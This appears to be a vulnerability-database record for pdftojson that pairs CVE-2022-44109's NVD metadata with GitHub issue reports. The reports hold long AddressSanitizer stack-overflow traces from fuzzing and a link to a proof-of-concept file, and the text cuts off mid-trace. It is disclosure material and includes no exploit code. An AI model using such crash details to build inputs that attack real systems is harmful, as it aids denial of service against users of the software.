#198 0x4f4618 in Catalog::countPageTree(Object*) /AFLplusplus/my_test/pdftojson-master/xpdf/Catalog.cc:442:12
#199 0x4f4618 in Catalog::countPageTree(Object*) /AFLplusplus/my_test/pdftojson-master/xpdf/Catalog.cc:442:12
#200 0x4f4618 in Catalog::countPageTree(Object*) /AFLplusplus/my_test/pdftojson-master/xpdf/Catalog.cc:442:12
#201 0x4f4618 in Catalog::countPageTree(Object*) /AFLplusplus/my_test/pdftojson-master/xpdf/Catalog.cc:442:12
#202 0x4f4618 in Catalog::countPageTree(Object*) /AFLplusplus/my_test/pdftojson-master/xpdf/Catalog.cc:442:12
#203 0x4f4618 in Catalog::countPageTree(Object*) /AFLplusplus/my_test/pdftojson-master/xpdf/Catalog.cc:442:12
#204 0x4f4618 in Catalog::countPageTree(Object*) /AFLplusplus/my_test/pdftojson-master/xpdf/Catalog.cc:442:12
#205 0x4f4618 in Catalog::countPageTree(Object*) /AFLplusplus/my_test/pdftojson-master/xpdf/Catalog.cc:442:12
#206 0x4f4618 in Catalog::countPageTree(Object*) /AFLplusplus/my_test/pdftojson-master/xpdf/Catalog.cc:442:12
#207 0x4f4618 in Catalog::countPageTree(Object*) /AFLplusplus/my_test/pdftojson-master/xpdf/Catalog.cc:442:12
#208 0x4f4618 in Catalog::countPageTree(Object*) /AFLplusplus/my_test/pdftojson-master/xpdf/Catalog.cc:442:12
#209 0x4f4618 in Catalog::countPageTree(Object*) /AFLplusplus/my_test/pdftojson-master/xpdf/Catalog.cc:442:12
#210 0x4f4618 in Catalog::countPageTree(Object*) /AFLplusplus/my_test/pdftojson-master/xpdf/Catalog.cc:442:12
#211 0x4f4618 in Catalog::countPageTree(Object*) /AFLplusplus/my_test/pdftojson-master/xpdf/Catalog.cc:442:12
#212 0x4f4618 in Catalog::countPageTree(Object*) /AFLplusplus/my_test/pdftojson-master/xpdf/Catalog.cc:442:12
#213 0x4f4618 in Catalog::countPageTree(Object*) /AFLplusplus/my_test/pdftojson-master/xpdf/Catalog.cc:442:12
#214 0x4f4618 in Catalog::countPageTree(Object*) /AFLplusplus/my_test/pdftojson-master/xpdf/Catalog.cc:442:12
#215 0x4f4618 in Catalog::countPageTree(Object*) /AFLplusplus/my_test/pdftojson-master/xpdf/Catalog.cc:442:12
#216 0x4f4618 in Catalog::countPageTree(Object*) /AFLplusplus/my_test/pdftojson-master/xpdf/Catalog.cc:442:12
#217 0x4f4618 in Catalog::countPageTree(Object*) /AFLplusplus/my_test/pdftojson-master/xpdf/Catalog.cc:442:12
#218 0x4f4618 in Catalog::countPageTree(Object*) /AFLplusplus/my_test/pdftojson-master/xpdf/Catalog.cc:442:12
#219 0x4f4618 in Catalog::countPageTree(Object*) /AFLplusplus/my_test/pdftojson-master/xpdf/Catalog.cc:442:12
#220 0x4f4618 in Catalog::countPageTree(Object*) /AFLplusplus/my_test/pdftojson-master/xpdf/Catalog.cc:442:12
#221 0x4f4618 in Catalog::countPageTree(Object*) /AFLplusplus/my_test/pdftojson-master/xpdf/Catalog.cc:442:12
#222 0x4f4618 in Catalog::countPageTree(Object*) /AFLplusplus/my_test/pdftojson-master/xpdf/Catalog.cc:442:12
#223 0x4f4618 in Catalog::countPageTree(Object*) /AFLplusplus/my_test/pdftojson-master/xpdf/Catalog.cc:442:12
#224 0x4f4618 in Catalog::countPageTree(Object*) /AFLplusplus/my_test/pdftojson-master/xpdf/Catalog.cc:442:12
#225 0x4f4618 in Catalog::countPageTree(Object*) /AFLplusplus/my_test/pdftojson-master/xpdf/Catalog.cc:442:12
#226 0x4f4618 in Catalog::countPageTree(Object*) /AFLplusplus/my_test/pdftojson-master/xpdf/Catalog.cc:442:12
#227 0x4f4618 in Catalog::countPageTree(Object*) /AFLplusplus/my_test/pdftojson-master/xpdf/Catalog.cc:442:12
#228 0x4f4618 in Catalog::countPageTree(Object*) /AFLplusplus/my_test/pdftojson-master/xpdf/Catalog.cc:442:12
#229 0x4f4618 in Catalog::countPageTree(Object*) /AFLplusplus/my_test/pdftojson-master/xpdf/Catalog.cc:442:12
#230 0x4f4618 in Catalog::countPageTree(Object*) /AFLplusplus/my_test/pdftojson-master/xpdf/Catalog.cc:442:12
#231 0x4f4618 in Catalog::countPageTree(Object*) /AFLplusplus/my_test/pdftojson-master/xpdf/Catalog.cc:442:12
#232 0x4f4618 in Catalog::countPageTree(Object*) /AFLplusplus/my_test/pdftojson-master/xpdf/Catalog.cc:442:12
#233 0x4f4618 in Catalog::countPageTree(Object*) /AFLplusplus/my_test/pdftojson-master/xpdf/Catalog.cc:442:12
#234 0x4f4618 in Catalog::countPageTree(Object*) /AFLplusplus/my_test/pdftojson-master/xpdf/Catalog.cc:442:12
#235 0x4f4618 in Catalog::countPageTree(Object*) /AFLplusplus/my_test/pdftojson-master/xpdf/Catalog.cc:442:12
#236 0x4f4618 in Catalog::countPageTree(Object*) /AFLplusplus/my_test/pdftojson-master/xpdf/Catalog.cc:442:12
#237 0x4f4618 in Catalog::countPageTree(Object*) /AFLplusplus/my_test/pdftojson-master/xpdf/Catalog.cc:442:12
#238 0x4f4618 in Catalog::countPageTree(Object*) /AFLplusplus/my_test/pdftojson-master/xpdf/Catalog.cc:442:12
#239 0x4f4618 in Catalog::countPageTree(Object*) /AFLplusplus/my_test/pdftojson-master/xpdf/Catalog.cc:442:12
#240 0x4f4618 in Catalog::countPageTree(Object*) /AFLplusplus/my_test/pdftojson-master/xpdf/Catalog.cc:442:12
#241 0x4f4618 in Catalog::countPageTree(Object*) /AFLplusplus/my_test/pdftojson-master/xpdf/Catalog.cc:442:12
#242 0x4f4618 in Catalog::countPageTree(Object*) /AFLplusplus/my_test/pdftojson-master/xpdf/Catalog.cc:442:12
#243 0x4f4618 in Catalog::countPageTree(Object*) /AFLplusplus/my_test/pdftojson-master/xpdf/Catalog.cc:442:12
#244 0x4f4618 in Catalog::countPageTree(Object*) /AFLplusplus/my_test/pdftojson-master/xpdf/Catalog.cc:442:12
#245 0x4f4618 in Catalog::countPageTree(Object*) /AFLplusplus/my_test/pdftojson-master/xpdf/Catalog.cc:442:12
#246 0x4f4618 in Catalog::countPageTree(Object*) /AFLplusplus/my_test/pdftojson-master/xpdf/Catalog.cc:442:12
#247 0x4f4618 in Catalog::countPageTree(Object*) /AFLplusplus/my_test/pdftojson-master/xpdf/Catalog.cc:442:12
#248 0x4f4618 in Catalog::countPageTree(Object*) /AFLplusplus/my_test/pdftojson-master/xpdf/Catalog.cc:442:12
#249 0x4f4618 in Catalog::countPageTree(Object*) /AFLplusplus/my_test/pdftojson-master/xpdf/Catalog.cc:442:12
SUMMARY: AddressSanitizer: stack-overflow (/AFLplusplus/my_test/pdftojson-master/tanuki/asan_bin/pdftojson+0x498936) in __asan_memcpy
==18031==ABORTING
```
### POC
[000000 (1).zip](https://github.com/ldenoue/pdftojson/files/8489119/000000.1.zip)
| stack-overflow in function Object::copy(Object*) :Object.cc:75:8 | https://api.github.com/repos/ldenoue/pdftojson/issues/3/comments | 0 | 2022-04-14T12:27:11Z | 2022-04-14T12:27:11Z | https://github.com/ldenoue/pdftojson/issues/3 | 1,204,465,646 | 3 | 4,529 |
CVE-2022-44109 | 2022-12-19T23:15:10.840 | pdftojson commit 94204bb was discovered to contain a stack overflow via the component Stream::makeFilter(char*, Stream*, Object*, int). | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/ldenoue/pdftojson"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/ldenoue/pdftojson/issues/4"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/ldenoue/pdftojson"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/ldenoue/pdftojson/issues/4"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:pdftojson_project:pdftojson:*:*:*:*:*:*:*:*",
"matchCriteriaId": "4DAA6592-8A19-42D7-8FDD-5EF232F583E8",
"versionEndExcluding": "2017-10-28",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"787"
] | 787 | https://github.com/ldenoue/pdftojson/issues/4 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"ldenoue",
"pdftojson"
] | ### Description
A stack-buffer-overflow was discovered in pdftojson.
The issue is being triggered in function Stream::makeFilter(char*, Stream*, Object*, int) /AFLplusplus/my_test/pdftojson-master/xpdf/Stream.cc:303:5
### Version
https://github.com/ldenoue/pdftojson/commit/94204bbfc523730db7c634c2c3952b9025cd7762
### Environment
Ubuntu 18.04,64bit
### Command
make && make install
### ASAN
```
AddressSanitizer:DEADLYSIGNAL
=================================================================
==11959==ERROR: AddressSanitizer: stack-overflow on address 0x7ffd2c385ff8 (pc 0x7fc8dd772ff2 bp 0x7ffd2c386580 sp 0x7ffd2c386000 T0)
#0 0x7fc8dd772ff2 in _IO_default_xsputn (/lib/x86_64-linux-gnu/libc.so.6+0x91ff2)
#1 0x7fc8dd75812b (/lib/x86_64-linux-gnu/libc.so.6+0x7712b)
#2 0x7fc8dd75aed1 (/lib/x86_64-linux-gnu/libc.so.6+0x79ed1)
#3 0x7fc8dd757d53 (/lib/x86_64-linux-gnu/libc.so.6+0x76d53)
#4 0x43d950 in fprintf (/AFLplusplus/my_test/pdftojson-master/tanuki/asan_bin/pdftojson+0x43d950)
#5 0x527db3 in error(ErrorCategory, long, char const*, ...) /AFLplusplus/my_test/pdftojson-master/xpdf/Error.cc:75:7
#6 0x6d59a5 in Stream::makeFilter(char*, Stream*, Object*, int) /AFLplusplus/my_test/pdftojson-master/xpdf/Stream.cc:303:5
#7 0x6d5224 in Stream::addFilters(Object*, int) /AFLplusplus/my_test/pdftojson-master/xpdf/Stream.cc:150:8
#8 0x6a9e9c in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int, int) /AFLplusplus/my_test/pdftojson-master/xpdf/Parser.cc:214:14
#9 0x6a8137 in Parser::getObj(Object*, int, unsigned char*, CryptAlgorithm, int, int, int, int) /AFLplusplus/my_test/pdftojson-master/xpdf/Parser.cc:101:18
#10 0x7775b9 in XRef::fetch(int, int, Object*, int) /AFLplusplus/my_test/pdftojson-master/xpdf/XRef.cc:1028:13
#11 0x6d510f in Object::arrayGet(int, Object*) /AFLplusplus/my_test/pdftojson-master/xpdf/./Object.h:231:19
#12 0x6d510f in Stream::addFilters(Object*, int) /AFLplusplus/my_test/pdftojson-master/xpdf/Stream.cc:144:11
#13 0x6a9e9c in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int, int) /AFLplusplus/my_test/pdftojson-master/xpdf/Parser.cc:214:14
#14 0x6a8137 in Parser::getObj(Object*, int, unsigned char*, CryptAlgorithm, int, int, int, int) /AFLplusplus/my_test/pdftojson-master/xpdf/Parser.cc:101:18
#15 0x7775b9 in XRef::fetch(int, int, Object*, int) /AFLplusplus/my_test/pdftojson-master/xpdf/XRef.cc:1028:13
#16 0x6d510f in Object::arrayGet(int, Object*) /AFLplusplus/my_test/pdftojson-master/xpdf/./Object.h:231:19
#17 0x6d510f in Stream::addFilters(Object*, int) /AFLplusplus/my_test/pdftojson-master/xpdf/Stream.cc:144:11
#18 0x6a9e9c in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int, int) /AFLplusplus/my_test/pdftojson-master/xpdf/Parser.cc:214:14
#19 0x6a8137 in Parser::getObj(Object*, int, unsigned char*, CryptAlgorithm, int, int, int, int) /AFLplusplus/my_test/pdftojson-master/xpdf/Parser.cc:101:18
#20 0x7775b9 in XRef::fetch(int, int, Object*, int) /AFLplusplus/my_test/pdftojson-master/xpdf/XRef.cc:1028:13
#21 0x6d510f in Object::arrayGet(int, Object*) /AFLplusplus/my_test/pdftojson-master/xpdf/./Object.h:231:19
#22 0x6d510f in Stream::addFilters(Object*, int) /AFLplusplus/my_test/pdftojson-master/xpdf/Stream.cc:144:11
#23 0x6a9e9c in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int, int) /AFLplusplus/my_test/pdftojson-master/xpdf/Parser.cc:214:14
#24 0x6a8137 in Parser::getObj(Object*, int, unsigned char*, CryptAlgorithm, int, int, int, int) /AFLplusplus/my_test/pdftojson-master/xpdf/Parser.cc:101:18
#25 0x7775b9 in XRef::fetch(int, int, Object*, int) /AFLplusplus/my_test/pdftojson-master/xpdf/XRef.cc:1028:13
#26 0x6d510f in Object::arrayGet(int, Object*) /AFLplusplus/my_test/pdftojson-master/xpdf/./Object.h:231:19
#27 0x6d510f in Stream::addFilters(Object*, int) /AFLplusplus/my_test/pdftojson-master/xpdf/Stream.cc:144:11
#28 0x6a9e9c in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int, int) /AFLplusplus/my_test/pdftojson-master/xpdf/Parser.cc:214:14
#29 0x6a8137 in Parser::getObj(Object*, int, unsigned char*, CryptAlgorithm, int, int, int, int) /AFLplusplus/my_test/pdftojson-master/xpdf/Parser.cc:101:18
#30 0x7775b9 in XRef::fetch(int, int, Object*, int) /AFLplusplus/my_test/pdftojson-master/xpdf/XRef.cc:1028:13
#31 0x6d510f in Object::arrayGet(int, Object*) /AFLplusplus/my_test/pdftojson-master/xpdf/./Object.h:231:19
#32 0x6d510f in Stream::addFilters(Object*, int) /AFLplusplus/my_test/pdftojson-master/xpdf/Stream.cc:144:11
#33 0x6a9e9c in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int, int) /AFLplusplus/my_test/pdftojson-master/xpdf/Parser.cc:214:14
#34 0x6a8137 in Parser::getObj(Object*, int, unsigned char*, CryptAlgorithm, int, int, int, int) /AFLplusplus/my_test/pdftojson-master/xpdf/Parser.cc:101:18
#35 0x7775b9 in XRef::fetch(int, int, Object*, int) /AFLplusplus/my_test/pdftojson-master/xpdf/XRef.cc:1028:13
#36 0x6d510f in Object::arrayGet(int, Object*) /AFLplusplus/my_test/pdftojson-master/xpdf/./Object.h:231:19
#37 0x6d510f in Stream::addFilters(Object*, int) /AFLplusplus/my_test/pdftojson-master/xpdf/Stream.cc:144:11
#38 0x6a9e9c in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int, int) /AFLplusplus/my_test/pdftojson-master/xpdf/Parser.cc:214:14
#39 0x6a8137 in Parser::getObj(Object*, int, unsigned char*, CryptAlgorithm, int, int, int, int) /AFLplusplus/my_test/pdftojson-master/xpdf/Parser.cc:101:18
#40 0x7775b9 in XRef::fetch(int, int, Object*, int) /AFLplusplus/my_test/pdftojson-master/xpdf/XRef.cc:1028:13
#41 0x6d510f in Object::arrayGet(int, Object*) /AFLplusplus/my_test/pdftojson-master/xpdf/./Object.h:231:19
#42 0x6d510f in Stream::addFilters(Object*, int) /AFLplusplus/my_test/pdftojson-master/xpdf/Stream.cc:144:11
#43 0x6a9e9c in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int, int) /AFLplusplus/my_test/pdftojson-master/xpdf/Parser.cc:214:14
#44 0x6a8137 in Parser::getObj(Object*, int, unsigned char*, CryptAlgorithm, int, int, int, int) /AFLplusplus/my_test/pdftojson-master/xpdf/Parser.cc:101:18
#45 0x7775b9 in XRef::fetch(int, int, Object*, int) /AFLplusplus/my_test/pdftojson-master/xpdf/XRef.cc:1028:13
#46 0x6d510f in Object::arrayGet(int, Object*) /AFLplusplus/my_test/pdftojson-master/xpdf/./Object.h:231:19
#47 0x6d510f in Stream::addFilters(Object*, int) /AFLplusplus/my_test/pdftojson-master/xpdf/Stream.cc:144:11
#48 0x6a9e9c in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int, int) /AFLplusplus/my_test/pdftojson-master/xpdf/Parser.cc:214:14
#49 0x6a8137 in Parser::getObj(Object*, int, unsigned char*, CryptAlgorithm, int, int, int, int) /AFLplusplus/my_test/pdftojson-master/xpdf/Parser.cc:101:18
#50 0x7775b9 in XRef::fetch(int, int, Object*, int) /AFLplusplus/my_test/pdftojson-master/xpdf/XRef.cc:1028:13
#51 0x6d510f in Object::arrayGet(int, Object*) /AFLplusplus/my_test/pdftojson-master/xpdf/./Object.h:231:19
#52 0x6d510f in Stream::addFilters(Object*, int) /AFLplusplus/my_test/pdftojson-master/xpdf/Stream.cc:144:11
#53 0x6a9e9c in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int, int) /AFLplusplus/my_test/pdftojson-master/xpdf/Parser.cc:214:14
#54 0x6a8137 in Parser::getObj(Object*, int, unsigned char*, CryptAlgorithm, int, int, int, int) /AFLplusplus/my_test/pdftojson-master/xpdf/Parser.cc:101:18
#55 0x7775b9 in XRef::fetch(int, int, Object*, int) /AFLplusplus/my_test/pdftojson-master/xpdf/XRef.cc:1028:13
#56 0x6d510f in Object::arrayGet(int, Object*) /AFLplusplus/my_test/pdftojson-master/xpdf/./Object.h:231:19
#57 0x6d510f in Stream::addFilters(Object*, int) /AFLplusplus/my_test/pdftojson-master/xpdf/Stream.cc:144:11
#58 0x6a9e9c in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int, int) /AFLplusplus/my_test/pdftojson-master/xpdf/Parser.cc:214:14
#59 0x6a8137 in Parser::getObj(Object*, int, unsigned char*, CryptAlgorithm, int, int, int, int) /AFLplusplus/my_test/pdftojson-master/xpdf/Parser.cc:101:18
#60 0x7775b9 in XRef::fetch(int, int, Object*, int) /AFLplusplus/my_test/pdftojson-master/xpdf/XRef.cc:1028:13
#61 0x6d510f in Object::arrayGet(int, Object*) /AFLplusplus/my_test/pdftojson-master/xpdf/./Object.h:231:19
#62 0x6d510f in Stream::addFilters(Object*, int) /AFLplusplus/my_test/pdftojson-master/xpdf/Stream.cc:144:11
#63 0x6a9e9c in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int, int) /AFLplusplus/my_test/pdftojson-master/xpdf/Parser.cc:214:14
#64 0x6a8137 in Parser::getObj(Object*, int, unsigned char*, CryptAlgorithm, int, int, int, int) /AFLplusplus/my_test/pdftojson-master/xpdf/Parser.cc:101:18
#65 0x7775b9 in XRef::fetch(int, int, Object*, int) /AFLplusplus/my_test/pdftojson-master/xpdf/XRef.cc:1028:13
#66 0x6d510f in Object::arrayGet(int, Object*) /AFLplusplus/my_test/pdftojson-master/xpdf/./Object.h:231:19
#67 0x6d510f in Stream::addFilters(Object*, int) /AFLplusplus/my_test/pdftojson-master/xpdf/Stream.cc:144:11
#68 0x6a9e9c in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int, int) /AFLplusplus/my_test/pdftojson-master/xpdf/Parser.cc:214:14
#69 0x6a8137 in Parser::getObj(Object*, int, unsigned char*, CryptAlgorithm, int, int, int, int) /AFLplusplus/my_test/pdftojson-master/xpdf/Parser.cc:101:18
#70 0x7775b9 in XRef::fetch(int, int, Object*, int) /AFLplusplus/my_test/pdftojson-master/xpdf/XRef.cc:1028:13
#71 0x6d510f in Object::arrayGet(int, Object*) /AFLplusplus/my_test/pdftojson-master/xpdf/./Object.h:231:19
#72 0x6d510f in Stream::addFilters(Object*, int) /AFLplusplus/my_test/pdftojson-master/xpdf/Stream.cc:144:11
#73 0x6a9e9c in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int, int) /AFLplusplus/my_test/pdftojson-master/xpdf/Parser.cc:214:14
#74 0x6a8137 in Parser::getObj(Object*, int, unsigned char*, CryptAlgorithm, int, int, int, int) /AFLplusplus/my_test/pdftojson-master/xpdf/Parser.cc:101:18
#75 0x7775b9 in XRef::fetch(int, int, Object*, int) /AFLplusplus/my_test/pdftojson-master/xpdf/XRef.cc:1028:13
#76 0x6d510f in Object::arrayGet(int, Object*) /AFLplusplus/my_test/pdftojson-master/xpdf/./Object.h:231:19
#77 0x6d510f in Stream::addFilters(Object*, int) /AFLplusplus/my_test/pdftojson-master/xpdf/Stream.cc:144:11
#78 0x6a9e9c in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int, int) /AFLplusplus/my_test/pdftojson-master/xpdf/Parser.cc:214:14
#79 0x6a8137 in Parser::getObj(Object*, int, unsigned char*, CryptAlgorithm, int, int, int, int) /AFLplusplus/my_test/pdftojson-master/xpdf/Parser.cc:101:18
#80 0x7775b9 in XRef::fetch(int, int, Object*, int) /AFLplusplus/my_test/pdftojson-master/xpdf/XRef.cc:1028:13
#81 0x6d510f in Object::arrayGet(int, Object*) /AFLplusplus/my_test/pdftojson-master/xpdf/./Object.h:231:19
#82 0x6d510f in Stream::addFilters(Object*, int) /AFLplusplus/my_test/pdftojson-master/xpdf/Stream.cc:144:11
#83 0x6a9e9c in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int, int) /AFLplusplus/my_test/pdftojson-master/xpdf/Parser.cc:214:14
#84 0x6a8137 in Parser::getObj(Object*, int, unsigned char*, CryptAlgorithm, int, int, int, int) /AFLplusplus/my_test/pdftojson-master/xpdf/Parser.cc:101:18
#85 0x7775b9 in XRef::fetch(int, int, Object*, int) /AFLplusplus/my_test/pdftojson-master/xpdf/XRef.cc:1028:13
#86 0x6d510f in Object::arrayGet(int, Object*) /AFLplusplus/my_test/pdftojson-master/xpdf/./Object.h:231:19
#87 0x6d510f in Stream::addFilters(Object*, int) /AFLplusplus/my_test/pdftojson-master/xpdf/Stream.cc:144:11
#88 0x6a9e9c in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int, int) /AFLplusplus/my_test/pdftojson-master/xpdf/Parser.cc:214:14
#89 0x6a8137 in Parser::getObj(Object*, int, unsigned char*, CryptAlgorithm, int, int, int, int) /AFLplusplus/my_test/pdftojson-master/xpdf/Parser.cc:101:18
#90 0x7775b9 in XRef::fetch(int, int, Object*, int) /AFLplusplus/my_test/pdftojson-master/xpdf/XRef.cc:1028:13
#91 0x6d510f in Object::arrayGet(int, Object*) /AFLplusplus/my_test/pdftojson-master/xpdf/./Object.h:231:19
#92 0x6d510f in Stream::addFilters(Object*, int) /AFLplusplus/my_test/pdftojson-master/xpdf/Stream.cc:144:11
#93 0x6a9e9c in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int, int) /AFLplusplus/my_test/pdftojson-master/xpdf/Parser.cc:214:14
#94 0x6a8137 in Parser::getObj(Object*, int, unsigned char*, CryptAlgorithm, int, int, int, int) /AFLplusplus/my_test/pdftojson-master/xpdf/Parser.cc:101:18
#95 0x7775b9 in XRef::fetch(int, int, Object*, int) /AFLplusplus/my_test/pdftojson-master/xpdf/XRef.cc:1028:13
#96 0x6d510f in Object::arrayGet(int, Object*) /AFLplusplus/my_test/pdftojson-master/xpdf/./Object.h:231:19
#97 0x6d510f in Stream::addFilters(Object*, int) /AFLplusplus/my_test/pdftojson-master/xpdf/Stream.cc:144:11
#98 0x6a9e9c in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int, int) /AFLplusplus/my_test/pdftojson-master/xpdf/Parser.cc:214:14
#99 0x6a8137 in Parser::getObj(Object*, int, unsigned char*, CryptAlgorithm, int, int, int, int) /AFLplusplus/my_test/pdftojson-master/xpdf/Parser.cc:101:18
#100 0x7775b9 in XRef::fetch(int, int, Object*, int) /AFLplusplus/my_test/pdftojson-master/xpdf/XRef.cc:1028:13
#101 0x6d510f in Object::arrayGet(int, Object*) /AFLplusplus/my_test/pdftojson-master/xpdf/./Object.h:231:19
#102 0x6d510f in Stream::addFilters(Object*, int) /AFLplusplus/my_test/pdftojson-master/xpdf/Stream.cc:144:11
#103 0x6a9e9c in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int, int) /AFLplusplus/my_test/pdftojson-master/xpdf/Parser.cc:214:14
#104 0x6a8137 in Parser::getObj(Object*, int, unsigned char*, CryptAlgorithm, int, int, int, int) /AFLplusplus/my_test/pdftojson-master/xpdf/Parser.cc:101:18
#105 0x7775b9 in XRef::fetch(int, int, Object*, int) /AFLplusplus/my_test/pdftojson-master/xpdf/XRef.cc:1028:13
#106 0x6d510f in Object::arrayGet(int, Object*) /AFLplusplus/my_test/pdftojson-master/xpdf/./Object.h:231:19
#107 0x6d510f in Stream::addFilters(Object*, int) /AFLplusplus/my_test/pdftojson-master/xpdf/Stream.cc:144:11
#108 0x6a9e9c in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int, int) /AFLplusplus/my_test/pdftojson-master/xpdf/Parser.cc:214:14
#109 0x6a8137 in Parser::getObj(Object*, int, unsigned char*, CryptAlgorithm, int, int, int, int) /AFLplusplus/my_test/pdftojson-master/xpdf/Parser.cc:101:18
#110 0x7775b9 in XRef::fetch(int, int, Object*, int) /AFLplusplus/my_test/pdftojson-master/xpdf/XRef.cc:1028:13
#111 0x6d510f in Object::arrayGet(int, Object*) /AFLplusplus/my_test/pdftojson-master/xpdf/./Object.h:231:19
#112 0x6d510f in Stream::addFilters(Object*, int) /AFLplusplus/my_test/pdftojson-master/xpdf/Stream.cc:144:11
#113 0x6a9e9c in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int, int) /AFLplusplus/my_test/pdftojson-master/xpdf/Parser.cc:214:14
#114 0x6a8137 in Parser::getObj(Object*, int, unsigned char*, CryptAlgorithm, int, int, int, int) /AFLplusplus/my_test/pdftojson-master/xpdf/Parser.cc:101:18
#115 0x7775b9 in XRef::fetch(int, int, Object*, int) /AFLplusplus/my_test/pdftojson-master/xpdf/XRef.cc:1028:13
#116 0x6d510f in Object::arrayGet(int, Object*) /AFLplusplus/my_test/pdftojson-master/xpdf/./Object.h:231:19
#117 0x6d510f in Stream::addFilters(Object*, int) /AFLplusplus/my_test/pdftojson-master/xpdf/Stream.cc:144:11
#118 0x6a9e9c in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int, int) /AFLplusplus/my_test/pdftojson-master/xpdf/Parser.cc:214:14
#119 0x6a8137 in Parser::getObj(Object*, int, unsigned char*, CryptAlgorithm, int, int, int, int) /AFLplusplus/my_test/pdftojson-master/xpdf/Parser.cc:101:18
#120 0x7775b9 in XRef::fetch(int, int, Object*, int) /AFLplusplus/my_test/pdftojson-master/xpdf/XRef.cc:1028:13
#121 0x6d510f in Object::arrayGet(int, Object*) /AFLplusplus/my_test/pdftojson-master/xpdf/./Object.h:231:19
#122 0x6d510f in Stream::addFilters(Object*, int) /AFLplusplus/my_test/pdftojson-master/xpdf/Stream.cc:144:11
#123 0x6a9e9c in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int, int) /AFLplusplus/my_test/pdftojson-master/xpdf/Parser.cc:214:14
#124 0x6a8137 in Parser::getObj(Object*, int, unsigned char*, CryptAlgorithm, int, int, int, int) /AFLplusplus/my_test/pdftojson-master/xpdf/Parser.cc:101:18
#125 0x7775b9 in XRef::fetch(int, int, Object*, int) /AFLplusplus/my_test/pdftojson-master/xpdf/XRef.cc:1028:13
#126 0x6d510f in Object::arrayGet(int, Object*) /AFLplusplus/my_test/pdftojson-master/xpdf/./Object.h:231:19
#127 0x6d510f in Stream::addFilters(Object*, int) /AFLplusplus/my_test/pdftojson-master/xpdf/Stream.cc:144:11
#128 0x6a9e9c in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int, int) /AFLplusplus/my_test/pdftojson-master/xpdf/Parser.cc:214:14
#129 0x6a8137 in Parser::getObj(Object*, int, unsigned char*, CryptAlgorithm, int, int, int, int) /AFLplusplus/my_test/pdftojson-master/xpdf/Parser.cc:101:18
#130 0x7775b9 in XRef::fetch(int, int, Object*, int) /AFLplusplus/my_test/pdftojson-master/xpdf/XRef.cc:1028:13
#131 0x6d510f in Object::arrayGet(int, Object*) /AFLplusplus/my_test/pdftojson-master/xpdf/./Object.h:231:19
#132 0x6d510f in Stream::addFilters(Object*, int) /AFLplusplus/my_test/pdftojson-master/xpdf/Stream.cc:144:11
#133 0x6a9e9c in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int, int) /AFLplusplus/my_test/pdftojson-master/xpdf/Parser.cc:214:14
#134 0x6a8137 in Parser::getObj(Object*, int, unsigned char*, CryptAlgorithm, int, int, int, int) /AFLplusplus/my_test/pdftojson-master/xpdf/Parser.cc:101:18
#135 0x7775b9 in XRef::fetch(int, int, Object*, int) /AFLplusplus/my_test/pdftojson-master/xpdf/XRef.cc:1028:13
#136 0x6d510f in Object::arrayGet(int, Object*) /AFLplusplus/my_test/pdftojson-master/xpdf/./Object.h:231:19
#137 0x6d510f in Stream::addFilters(Object*, int) /AFLplusplus/my_test/pdftojson-master/xpdf/Stream.cc:144:11
#138 0x6a9e9c in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int, int) /AFLplusplus/my_test/pdftojson-master/xpdf/Parser.cc:214:14
